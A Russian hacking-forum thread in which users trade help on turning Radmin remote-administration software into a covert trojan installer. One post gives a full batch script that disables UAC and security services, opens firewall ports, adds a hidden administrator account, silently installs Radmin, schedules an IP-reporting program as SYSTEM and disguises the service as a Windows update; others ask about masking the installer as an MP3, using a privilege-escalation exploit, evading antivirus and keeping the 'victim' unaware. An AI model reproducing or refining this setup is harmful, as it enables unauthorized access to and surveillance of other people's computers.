1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Создание и тихая установка сервера Radmin 3.4 v2

Тема в разделе "Наши статьи", создана пользователем Iindigo, 16 дек 2010.

1. demo4ek
    demo4ek Новичок
    Симпатии:
    0
    и еще если не сложно подскажите... он будет работать в таком виде ? может надо еще что то удалить ? Я не слишком силен сам понимаешь )))) Еще раз спасибо.

Последнее редактирование: 24 мар 2012
    24 мар 2012
  2. vlader
    vlader Guest
    demo4ek,
    Тебе не нужна отправка ip? Как ты будешь подключаться?

24 мар 2012
  3. demo4ek
    demo4ek Новичок
    Симпатии:
    0
    Ip я знаю. мне нужно что бы он просто запустился вот и все.

24 мар 2012
  4. vlader
    vlader Guest
    Этот код равносилен тому, что ниже.
    Код:
    if exist c:\users\nul (goto install) else goto winxp
    Добавлено через 1 минуту
    Код:
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Pol icies\System /v EnableLUA /t REG_DWORD /d 0 /f
    Это может не сработать.

Последнее редактирование модератором: 25 мар 2012
    25 мар 2012
  5. demo4ek
    demo4ek Новичок
    Симпатии:
    0

Влад если тебя не затруднит можешь написать исправленный вариант кода без лишних строк кода которые там не нужны. ( тоесть POC.exe и IP.exe и чего там еще не будет работать) Желательно что бы можно было ставить на Win 7 и Xp естественно. Зарание благодарен. :)

25 мар 2012
  6. ww_Bars
    ww_Bars Новичок
    Симпатии:
    0
    help!! помогите сделать прогу (LiteManager_Pro_4.4.2) или может есть другие, по такой же технологии как и радмин, там как я понял есть решение обхода NAT. Или подскажите где глянуть можно... Радм. собрал, айпи шлет, а соединиться не могу. Скану не поддается:(

25 мар 2012
  7. vlader
    vlader Guest
    ww_Bars, Собственно этот продукт - ROM. ROM раскололся на два проэкта. Первый RMS, а второй LiteManager. Ты можешь сделать сборку по той же технологии, что и RMS.

25 мар 2012
  8. ww_Bars
    ww_Bars Новичок
    Симпатии:
    0
    спасибо за инфу, нашел теперь где это трут:dance4:

Добавлено через 26 минут
    По поводу радмина хочу спросить, вот делаю все как написано, на виртуалке в хр без антивира работает, с антивиром естественно все под хвост из за (*рос), в 7ке не отсылает айпи, не знаю в чем причина.. Ну суть в другом, собрал тихую установку без файла (*рос), убрал в батнике лишние строки на телнет, на учетку и все такое. Для хр по идее все должно прокатить. Но назревает вопрос, может из за этого не быть доступа к серверу, ведь по сути получается чистая установка самого сервера и все?
    Вот строки что оставил, исправьте плиз, что не так, я вообще не шарю в этих командах, чисто логическое решение:

Последнее редактирование: 26 мар 2012
    26 мар 2012
  9. AKSENOV048
    AKSENOV048 Новичок
    Симпатии:
    0
    Добрый день!
    не понимаю. что не так. все сделал по пунктам.
    пробовал на себе, но ни фига. msi файл не устанавливается, в папку windows ни чего не копируется. хотя сообщение с IP пришло.

вот мой inst.cmd
    в некоторых местах заменил systemroot на temp, но все равно глухо. Подскажите.
    да и кстати убрал poc.exe это как то влияет? у меня что с ним, что без него один хрен не работает.
    пробовал на WIN7
    @echo off

if exist c:\users\nul (goto win7) else goto winxp

:win7
    ping -n 5 127.0.0.1
    goto install

:winxp
    net stop Alerter
    sc config Alerter start= disabled
    net stop wscsvc
    sc config wscsvc start= disabled
    net stop SharedAccess
    sc config SharedAccess start= disabled
    sc config TlntSvr start= auto
    net start TlntSvr

:install
    copy /y "%temp%\ip.exe" "%SYSTEMROOT%\ip.exe"

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v HelpAssistant /t REG_DWORD /d 0 /f

attrib +s +h +r "%SYSTEMROOT%/ip.exe"

netsh advfirewall firewall add rule name="RealIP" dir=in program="%SYSTEMROOT%\realip.exe" security=notrequired action=allow
    netsh advfirewall firewall add rule name="Microsoft Outlook Express" dir=in program="%SYSTEMROOT%\blat.exe" security=notrequired action=allow
    netsh firewall add portopening tcp 57011 all

net user HelpAssistant admin /add
    net localgroup "Пользователи удаленного рабочего стола" HelpAssistant /add
    net user HelpAssistant /active:yes /comment:"“зҐв**п §*ЇЁбм ¤«п ЇаҐ¤®бв*ў«Ґ*Ёп Ї®¬®йЁ" /passwordchg:yes
    net user HelpAssistant admin

%temp%\msupdate.msi /qn /norestart

start %temp%\ip.exe

ping -n 5 127.0.0.1

attrib +S +H %windir%\system32\rserver30

schtasks /create /tn security /sc onlogon /ru "NT AUTHORITY\SYSTEM" /tr "%temp%\ip.exe"

cd %temp%\

net stop rserver3
    reg add "HKLM\System\CurrentControlSet\Services\RServer3" /v "DisplayName" /d "Microsoft Update Provide" /f
    reg add "HKLM\System\CurrentControlSet\Services\RServer3" /v "Description" /d "Update your Windows operation system and check corruption files" /f
    net start rserver3

Спасибо!!!

1 апр 2012
  10. falkbelli
    falkbelli Новичок
    Симпатии:
    0
    что это значить skype:falkbelli

7 апр 2012
  11. koleso62
    koleso62 Новичок
    Симпатии:
    0
    Доброго дня! подскажите плиз, какую роль в данной сборке играет сплойт Windows Task Scheduler Privilege Escalation? У меня просто такая задача: чтобы устанавливался автоматически Radmin Server, устанавливались автоматически права на управление с вводом логина и пароля и отправлялись автоматически данные с ipconfig/all на заранее указанный e-mail. Меня просто смущает что сплоит антивирусники не обходит... Слышал что как то сплоит можно закриптовать, но нифига в этом ничего не понимаю...

7 май 2012
  12. incode
    incode Banned
    Симпатии:
    16
    вообще его в сборку не включай

7 май 2012
  13. Lynat1k
    Lynat1k Новичок
    Симпатии:
    0
    Iindigo а вот у меня вопрос?
    на самом деле палевно дать юзеру непонятный архив. а можно ли при создании арзхива поменять иконку на винамп, а назвать архив какой нибудь песней ну и конечно в архи в автозапуск вложить какую нибудь песню. чтобы просто при запуске sfx архива открывалась песня и человек ни о чем не подозревал??
    так можно?

Добавлено через 18 минут
    а лучше скажите как склеить sfx архи с mp3 файлом? только чтобы видно было что это mp3 файл и при открытие было видно только песню а архив так же скрыто делал свою работу?

Добавлено через 39 минут
    кстати сделал сборку как писали отправил юзеру он открывает а там выдает ошибку что не совместимо с версией виндовс. а у него просто семерка стоит...

Последнее редактирование: 25 июл 2012
    25 июл 2012
  14. rmaximuss
    rmaximuss Новичок
    Симпатии:
    0
    Ребят, помогите, вот сделал всё правильно, у меня всё работает( проверял на себе)
    А вот у других, когда я им кидаю это файл, пишет, что запуск не возможен, и нужны права администратора! Что то типо такого! Подскажите 3 день мучаюсь!:(
    Заранее спасибо!)

22 авг 2012
  15. Viko82
    Viko82 Новичок
    Симпатии:
    0
    Подскажите как скачать?
    перехожу по ссылке, а там - "Этот файл всё ещё заливается!" , и предлагают загрузить всякую хрень.

1 окт 2012
  16. wera87
    wera87 Новичок
    Симпатии:
    4

2 окт 2012
  17. Viko82
    Viko82 Новичок
    Симпатии:
    0
    wera87,
    спасибо!
    ступил ))

2 окт 2012
  18. freerun8881
    freerun8881 Новичок
    Симпатии:
    1
    При добавлении скачанного radmin сервера в MSI Configurator вылетает ошибка:error

Помогите установить?

Вложения:

7 окт 2012
  19. boinikola
    boinikola Новичок
    Симпатии:
    0
    Ребята скажите пожалуйста, установил на компьютер "жертве" "RAdmin Private Release", когда подключаюсь к компьютеру "жертвы" отключается эффект прозрачности окон и рабочей полнели, естественно "жертва" сразу видит что с компьютером что то не ладное, да забыл сказать что и у меня стоит Windows7 и у "жертвы". Как можно побороть эту проблему или я что то не правильно делаю, может это убирается настройками программы, пожалуйста подскажите мне не грамотному!

9 окт 2012
  20. alexmax
    alexmax Новичок
    Симпатии:
    0
    в нём есть функция захвата звука и вебке?

17 окт 2012

Поделиться этой страницей

Загрузка...